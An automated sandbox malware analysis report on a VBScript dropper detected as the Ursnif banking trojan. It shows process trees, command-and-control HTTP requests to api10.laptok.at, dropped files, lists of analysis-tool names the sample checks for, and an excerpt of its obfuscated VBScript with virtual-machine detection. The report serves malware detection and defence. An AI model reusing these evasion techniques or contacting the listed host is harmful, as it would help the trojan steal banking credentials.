Loading ...

Play interactive tourEdit tour

Analysis Report YvGLRQ2lBoNg.vbs

Overview

General Information

Sample Name:YvGLRQ2lBoNg.vbs
Analysis ID:284796
MD5:0671e735481a55031081895bf0f57760
SHA1:11788132e8b10e6370530d68d2d562737ef1dae0
SHA256:f9ad25e0810fc3f545213be438f531677595044c6a64d6b367e93b9aad9910e6

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 5576 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\YvGLRQ2lBoNg.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 5524 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6500 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5524 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5928 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6120 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5928 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.499146589.0000000005718000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000004.00000003.499050996.0000000005718000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000004.00000003.499116737.0000000005718000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000004.00000003.498994540.0000000005718000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000004.00000003.499095914.0000000005718000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 3 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\ogress.psdAvira: detection malicious, Label: TR/Kryptik.fklcr
            Multi AV Scanner detection for domain / URLShow sources
            Source: api10.laptok.atVirustotal: Detection: 8%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\ogress.psdVirustotal: Detection: 7%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\ogress.psdReversingLabs: Detection: 20%
            Multi AV Scanner detection for submitted fileShow sources
            Source: YvGLRQ2lBoNg.vbsVirustotal: Detection: 21%Perma Link
            Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
            Source: global trafficHTTP traffic detected: GET /api1/d_2FkQMQPNS1PtreuLmDr0c/isKQ3en2ep/WdaePBnxWvNr4O7Zx/fe5GpcKXEs0Z/nWv1haJIdxX/KPQImnsWZc6Bts/3T1sv6KdCgBkk8kTcY4Tw/vLBIAR6SvcfKkftr/v3qWzzjdQvHhSwJ/vN5Dy_2FrTM09tl_2F/E9H6fSft8/LNlFBPxAbjE4J0c6TJOC/anV9v94dZW1QTs_2Fbn/bfOfyFPP6TfVwktOgPJiQQ/RMTYA97pNPcLL/nGwKPMp2/dEpg95nX_2B2Qt_0A_0DKLH/tTw8xa4uQv/h6OXh5Fmz3Z3zI7T2/MnlbUyKlzKYN/4KNu2_2B_2B/GIckXkWWxkB/utBojx5s HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/1D7z5XkAX/_2FbQrtYcD1kFDfXonyT/Jj2mYzkdYtc4R7X6fxc/9urYr1WZcWa6ZWnQBAZ43f/xval831E1IBwG/n6pzC3ar/eKGANQIthekvo9zg_2Fb94x/iPFw6um9yA/exbRhIIlmYTmBTpxl/jJEsgsP3dBx9/zs5yDfHduFs/ySeUPKocHhrMVB/Q8EDMO_2B3zJSk5QBFGvT/Yy3iBRuEUbqp4Kxn/CqGIdwKcFdmihQj/fosd0P6SSgwFfVNavf/RyCG8rcLK/w_0A_0D7W0vvsSLrshwz/e9K8aNiOBT0pOorA5hH/f7RmqSwXFZJni1LXH4cpYp/tjerjQMglan/92z HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: msapplication.xml1.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x81a0cb84,0x01d68993</date><accdate>0x81a0cb84,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml1.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x81a0cb84,0x01d68993</date><accdate>0x81a0cb84,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml6.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x81a32dd6,0x01d68993</date><accdate>0x81a32dd6,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml6.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x81a32dd6,0x01d68993</date><accdate>0x81a32dd6,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml8.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x81a5901e,0x01d68993</date><accdate>0x81a5901e,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml8.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x81a5901e,0x01d68993</date><accdate>0x81a5901e,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: msapplication.xml.17.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml2.17.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml3.17.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml4.17.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml5.17.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml6.17.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml7.17.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml8.17.drString found in binary or memory: http://www.youtube.com/

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.499146589.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499050996.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499116737.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.498994540.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499095914.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499022832.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499133343.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499076887.0000000005718000.00000004.00000040.sdmp, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.499146589.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499050996.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499116737.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.498994540.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499095914.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499022832.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499133343.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499076887.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\ogress.psd 034F2720D2408955AE412FD3657F6D1E50677CFCC8B5D030F3BC1F9D195AD21F
            Source: YvGLRQ2lBoNg.vbsInitial sample: Strings found which are bigger than 50
            Source: classification engineClassification label: mal100.troj.evad.winVBS@7/17@2/1
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\YvGLRQ2lBoNg.vbs'
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: YvGLRQ2lBoNg.vbsVirustotal: Detection: 21%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\YvGLRQ2lBoNg.vbs'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5524 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5928 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5524 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5928 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\wscript.exeAutomated click: OK
            Source: C:\Windows\System32\wscript.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\LyncJump to behavior
            Source: YvGLRQ2lBoNg.vbsStatic file information: File size 1452344 > 1048576
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: Binary string: c:\meet\well\Brought\story\During\2\claim\84\Could\6\Element\Motion\3\Shore\market.pdb source: ogress.psd.1.dr

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptName, cStr(555551152)) > 0 And astronomy146 = 0) ThenExit Function' gargle triphammer fusillade Emile goober height Colombia317 Cameroon infantile macaque Virgil15 larynx Blair Vassar citron Marjory319 ticket Horowitz doubt pounce genius prolate expurgate trichloroethane hap114 gurgle spear Tommie stereo contraption clank710 counterfeit boutique teenage attrition stratify stannic polysemous volcanism candle stenographer649 noontime metallography, 8485223 chrome night clapboard squalid wacky. 1611065 iambic Belgrade697 peaceful kickback formulaic versus tuff598 xerox899 gaur registrable quagmire. distort767 bodybuilding channel diagrammed parolee900 Balzac. acme. Kirkpatrick stardom virgin payroll688, 230300 Corbett646 Isaiah tectonic Sharon787 abolition planet nightshade Bini touchdown condescension effusion728 societal proverbial822 raven erosion twig gadgetry. cavalier townsmen Arlen solitary exclusive Togo side960 crore gardenia skyhook proctor End IfSet waggle651 = GetObject("winmgmts:\\.\root\cimv2")Set adjust193lItems = waggle651.ExecQuery("Select * from Win32_Processor", , ((46 + 34.0) + (-((88 + (-60.0)) + 4.0))))For Each glycine543 In adjust193lItemsIf glycine543.NumberOfCores < (((1786 - 1758.0) + (40 + (-30.0))) - 35.0) ThenISsAHR = TrueREM soup extent populism curvilinear Ethiopia290 adposition lineman glycerinate77 Hillcrest Vance scapula metazoa console48 athletic herringbone raillery jure adorn fiance Middlesex miniature58 spiritual McHugh813 Bengal repelling pyrotechnic bivalve215 Cottrell Sandburg seder swart murk comprehend serology Tunis souvenir362 hoodlum quartile pike switchboard clairvoyant arabesque580 continual bindle collard616 chassis rainy fifteenth shorthand End IfREM prosody indices. 2301989 booky875 Swede hardcopy lessee devotion507, 9597409 Congo542 commandant493 Syria. bakery692. tori bushy560 highball nugget401 bedfast Copenhagen down commensurate dot paragon574 surname spree clairvoyant664 Oneida Bose636 CDC panicky. 851619 begetting. 5002303 bifocal945 Bushnell134 prick827 planeload113 equatorial187. keelson slapstick merchant511 nor contrabass leggy cluster Stewart rheostat Essen471 spheric re lobby henceforth merrymake spangle Leland contain Standish crutch607 blowup smuggle Wittgenstein650 fugal, 745304 Thessaly. 9793611 conqueror851 Casanova770 transferral spear282 indecomposable Macedonia ecosystem poison pathogenic, skipjack idyllic980 solitude moose Palomar Knapp un shrimp archetype yarn Multics radian Howe291 Cowan Caldwell, converge aching isocline Bavaria variable otiose977 voyage paper, autopilot332 NextIf ISsAHR ThenAYdtfwwDEnd If' minesweeper548 violin603, glove scowl mignon40 Markov lovebird, thirst godmother Mukden Cranford. gunmen Wilma genealogy ski tokamak947 abetting ecosystem715 apocalyptic, sora tyrannicide serf resist Eduardo Christensen Catherwood disrupt mercurial seaboard, 6929809 rein933 fin extent210 polytope. qua modern10 . indelicate lycopodium explicate hesi

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\ogress.psdJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\ogress.psdJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.499146589.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499050996.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499116737.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.498994540.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499095914.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499022832.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499133343.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499076887.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\yvglrq2lbong.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
            Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
            Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ogress.psdJump to dropped file
            Source: C:\Windows\System32\wscript.exe TID: 1420Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: ogress.psd.1.drBinary or memory string: /ku ridg;> on g,saiprlFsF/o( gtts

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: ogress.psd.1.drJump to dropped file
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: procmon.exe
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: avz.exe
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: cports.exe
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
            Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmpBinary or memory string: icesword.exe
            Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
            Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmpBinary or memory string: regshot.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.499146589.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499050996.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499116737.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.498994540.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499095914.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499022832.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499133343.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499076887.0000000005718000.00000004.00000040.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.499146589.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499050996.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499116737.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.498994540.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499095914.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499022832.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499133343.0000000005718000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.499076887.0000000005718000.00000004.00000040.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
